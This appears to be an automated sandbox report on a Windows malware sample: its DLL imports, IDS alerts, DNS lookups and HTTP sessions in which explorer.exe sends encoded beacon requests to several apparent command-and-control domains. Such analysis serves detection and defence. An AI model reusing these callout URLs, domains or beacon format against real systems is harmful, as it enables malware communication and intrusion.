                                               USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                               GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                               SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                               ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                               COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                               ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                               VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                               Language of compilation system | Country where language is spoken | Map
                                               English | United States
                                               Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                               01/28/22-10:47:39.147652 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49805 | 34.102.136.180 | 192.168.2.7
                                               01/28/22-10:48:06.427875 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49843 | 34.102.136.180 | 192.168.2.7
                                               01/28/22-10:48:32.236240 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49847 | 35.186.238.101 | 192.168.2.7
                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Jan 28, 2022 10:47:38.887885094 CET | 49805 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:47:38.906588078 CET | 80 | 49805 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:47:38.906719923 CET | 49805 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:47:38.906887054 CET | 49805 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:47:38.925517082 CET | 80 | 49805 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:47:39.147651911 CET | 80 | 49805 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:47:39.147681952 CET | 80 | 49805 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:47:39.147849083 CET | 49805 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:47:39.147918940 CET | 49805 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:47:39.167936087 CET | 80 | 49805 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.213960886 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.496222973 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.496540070 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.496579885 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.773350000 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.877895117 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.878005028 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.878119946 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.878442049 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.879188061 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.879266977 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.986690044 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.994749069 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.994793892 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.994906902 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.995917082 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.995954037 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.996098042 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:44.996119976 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:45.140021086 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:45.140058994 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:45.140117884 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:45.140158892 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:45.279189110 CET | 80 | 49815 | 148.72.244.75 | 192.168.2.7
                                               Jan 28, 2022 10:47:45.279328108 CET | 49815 | 80 | 192.168.2.7 | 148.72.244.75
                                               Jan 28, 2022 10:47:50.193769932 CET | 49820 | 80 | 192.168.2.7 | 156.246.248.162
                                               Jan 28, 2022 10:47:50.376739025 CET | 80 | 49820 | 156.246.248.162 | 192.168.2.7
                                               Jan 28, 2022 10:47:50.377485037 CET | 49820 | 80 | 192.168.2.7 | 156.246.248.162
                                               Jan 28, 2022 10:47:50.377623081 CET | 49820 | 80 | 192.168.2.7 | 156.246.248.162
                                               Jan 28, 2022 10:47:50.624048948 CET | 80 | 49820 | 156.246.248.162 | 192.168.2.7
                                               Jan 28, 2022 10:47:50.624069929 CET | 80 | 49820 | 156.246.248.162 | 192.168.2.7
                                               Jan 28, 2022 10:47:50.626971006 CET | 49820 | 80 | 192.168.2.7 | 156.246.248.162
                                               Jan 28, 2022 10:47:50.627028942 CET | 49820 | 80 | 192.168.2.7 | 156.246.248.162
                                               Jan 28, 2022 10:47:50.810301065 CET | 80 | 49820 | 156.246.248.162 | 192.168.2.7
                                               Jan 28, 2022 10:48:06.293247938 CET | 49843 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:48:06.311955929 CET | 80 | 49843 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:48:06.312073946 CET | 49843 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:48:06.312361002 CET | 49843 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:48:06.330950975 CET | 80 | 49843 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:48:06.427875042 CET | 80 | 49843 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:48:06.427902937 CET | 80 | 49843 | 34.102.136.180 | 192.168.2.7
                                               Jan 28, 2022 10:48:06.428383112 CET | 49843 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:48:06.428402901 CET | 49843 | 80 | 192.168.2.7 | 34.102.136.180
                                               Jan 28, 2022 10:48:06.447251081 CET | 80 | 49843 | 34.102.136.180 | 192.168.2.7
                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Jan 28, 2022 10:47:28.771871090 CET | 64569 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:47:28.811583042 CET | 53 | 64569 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:47:38.849167109 CET | 59730 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:47:38.883527040 CET | 53 | 59730 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:47:44.179296970 CET | 59310 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:47:44.212059021 CET | 53 | 59310 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:47:50.009982109 CET | 64296 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:47:50.192629099 CET | 53 | 64296 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:48:06.270339012 CET | 56680 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:48:06.291172981 CET | 53 | 56680 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:48:11.441534042 CET | 58820 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:48:11.480706930 CET | 53 | 58820 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:48:16.489336014 CET | 60983 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:48:16.531825066 CET | 53 | 60983 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:48:21.614301920 CET | 52286 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:48:21.957580090 CET | 53 | 52286 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:48:26.972152948 CET | 56064 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:48:26.993797064 CET | 53 | 56064 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:48:32.076863050 CET | 63744 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:48:32.101113081 CET | 53 | 63744 | 8.8.8.8 | 192.168.2.7
                                               Jan 28, 2022 10:48:37.247196913 CET | 61457 | 53 | 192.168.2.7 | 8.8.8.8
                                               Jan 28, 2022 10:48:37.562048912 CET | 53 | 61457 | 8.8.8.8 | 192.168.2.7
                                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                               Jan 28, 2022 10:47:28.771871090 CET | 192.168.2.7 | 8.8.8.8 | 0x82b2 | Standard query (0) | www.inslidr.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:47:38.849167109 CET | 192.168.2.7 | 8.8.8.8 | 0x7c9d | Standard query (0) | www.carriewilliamsinc.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:47:44.179296970 CET | 192.168.2.7 | 8.8.8.8 | 0xaae2 | Standard query (0) | www.gooooooo.xyz | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:47:50.009982109 CET | 192.168.2.7 | 8.8.8.8 | 0x99df | Standard query (0) | www.yixuan5.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:06.270339012 CET | 192.168.2.7 | 8.8.8.8 | 0xb609 | Standard query (0) | www.farmacymerchants.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:11.441534042 CET | 192.168.2.7 | 8.8.8.8 | 0xb621 | Standard query (0) | www.ehaszthecarpetbagger.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:16.489336014 CET | 192.168.2.7 | 8.8.8.8 | 0x678c | Standard query (0) | www.freelance-rse.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:21.614301920 CET | 192.168.2.7 | 8.8.8.8 | 0xad15 | Standard query (0) | www.nbjcgl.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:26.972152948 CET | 192.168.2.7 | 8.8.8.8 | 0x16e9 | Standard query (0) | www.wildberryhair.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:32.076863050 CET | 192.168.2.7 | 8.8.8.8 | 0xea1 | Standard query (0) | www.micorgas.com | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:37.247196913 CET | 192.168.2.7 | 8.8.8.8 | 0xa237 | Standard query (0) | www.postmoon.xyz | A (IP address) | IN (0x0001)
                                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                               Jan 28, 2022 10:47:28.811583042 CET | 8.8.8.8 | 192.168.2.7 | 0x82b2 | Name error (3) | www.inslidr.com | none | none | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:47:38.883527040 CET | 8.8.8.8 | 192.168.2.7 | 0x7c9d | No error (0) | www.carriewilliamsinc.com | carriewilliamsinc.com |  | CNAME (Canonical name) | IN (0x0001)
                                               Jan 28, 2022 10:47:38.883527040 CET | 8.8.8.8 | 192.168.2.7 | 0x7c9d | No error (0) | carriewilliamsinc.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:47:44.212059021 CET | 8.8.8.8 | 192.168.2.7 | 0xaae2 | No error (0) | www.gooooooo.xyz | gooooooo.xyz |  | CNAME (Canonical name) | IN (0x0001)
                                               Jan 28, 2022 10:47:44.212059021 CET | 8.8.8.8 | 192.168.2.7 | 0xaae2 | No error (0) | gooooooo.xyz |  | 148.72.244.75 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:47:50.192629099 CET | 8.8.8.8 | 192.168.2.7 | 0x99df | No error (0) | www.yixuan5.com |  | 156.246.248.162 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:06.291172981 CET | 8.8.8.8 | 192.168.2.7 | 0xb609 | No error (0) | www.farmacymerchants.com | farmacymerchants.com |  | CNAME (Canonical name) | IN (0x0001)
                                               Jan 28, 2022 10:48:06.291172981 CET | 8.8.8.8 | 192.168.2.7 | 0xb609 | No error (0) | farmacymerchants.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:11.480706930 CET | 8.8.8.8 | 192.168.2.7 | 0xb621 | Name error (3) | www.ehaszthecarpetbagger.com | none | none | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:16.531825066 CET | 8.8.8.8 | 192.168.2.7 | 0x678c | No error (0) | www.freelance-rse.com | freelance-rse.com |  | CNAME (Canonical name) | IN (0x0001)
                                               Jan 28, 2022 10:48:16.531825066 CET | 8.8.8.8 | 192.168.2.7 | 0x678c | No error (0) | freelance-rse.com |  | 193.141.3.66 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:21.957580090 CET | 8.8.8.8 | 192.168.2.7 | 0xad15 | Name error (3) | www.nbjcgl.com | none | none | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:26.993797064 CET | 8.8.8.8 | 192.168.2.7 | 0x16e9 | No error (0) | www.wildberryhair.com |  | 172.67.168.28 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:26.993797064 CET | 8.8.8.8 | 192.168.2.7 | 0x16e9 | No error (0) | www.wildberryhair.com |  | 104.21.46.57 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:32.101113081 CET | 8.8.8.8 | 192.168.2.7 | 0xea1 | No error (0) | www.micorgas.com |  | 35.186.238.101 | A (IP address) | IN (0x0001)
                                               Jan 28, 2022 10:48:37.562048912 CET | 8.8.8.8 | 192.168.2.7 | 0xa237 | Name error (3) | www.postmoon.xyz | none | none | A (IP address) | IN (0x0001)
                                              • www.carriewilliamsinc.com
                                              • www.gooooooo.xyz
                                              • www.yixuan5.com
                                              • www.farmacymerchants.com
                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               0 | 192.168.2.7 | 49805 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                               Timestamp | kBytes transferred | Direction | Data
                                               Jan 28, 2022 10:47:38.906887054 CET | 17399 | OUT | GET /b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.carriewilliamsinc.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Jan 28, 2022 10:47:39.147651911 CET | 17401 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Fri, 28 Jan 2022 09:47:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "61f281b6-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               1 | 192.168.2.7 | 49815 | 148.72.244.75 | 80 | C:\Windows\explorer.exe
                                               Timestamp | kBytes transferred | Direction | Data
                                               Jan 28, 2022 10:47:44.496579885 CET | 17928 | OUT | GET /b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.gooooooo.xyz
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Jan 28, 2022 10:47:44.877895117 CET | 17930 | IN | HTTP/1.1 404 Not Found
                                              Date: Fri, 28 Jan 2022 09:47:44 GMT
                                              Server: Apache
                                              Accept-Ranges: bytes
                                              Cache-Control: no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Expires: 0
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html
                                              Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 
20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b
                                              Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                               2 | 192.168.2.7 | 49820 | 156.246.248.162 | 80 | C:\Windows\explorer.exe
                                               Timestamp | kBytes transferred | Direction | Data
                                               Jan 28, 2022 10:47:50.377623081 CET | 17956 | OUT | GET /b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.yixuan5.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                               Jan 28, 2022 10:47:50.624048948 CET | 17957 | IN | HTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Server: Microsoft-IIS/7.5
                                              X-Powered-By: ASP.NET
                                              Date: Fri, 28 Jan 2022 09:47:47 GMT
                                              Connection: close
                                              Content-Length: 1163
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 
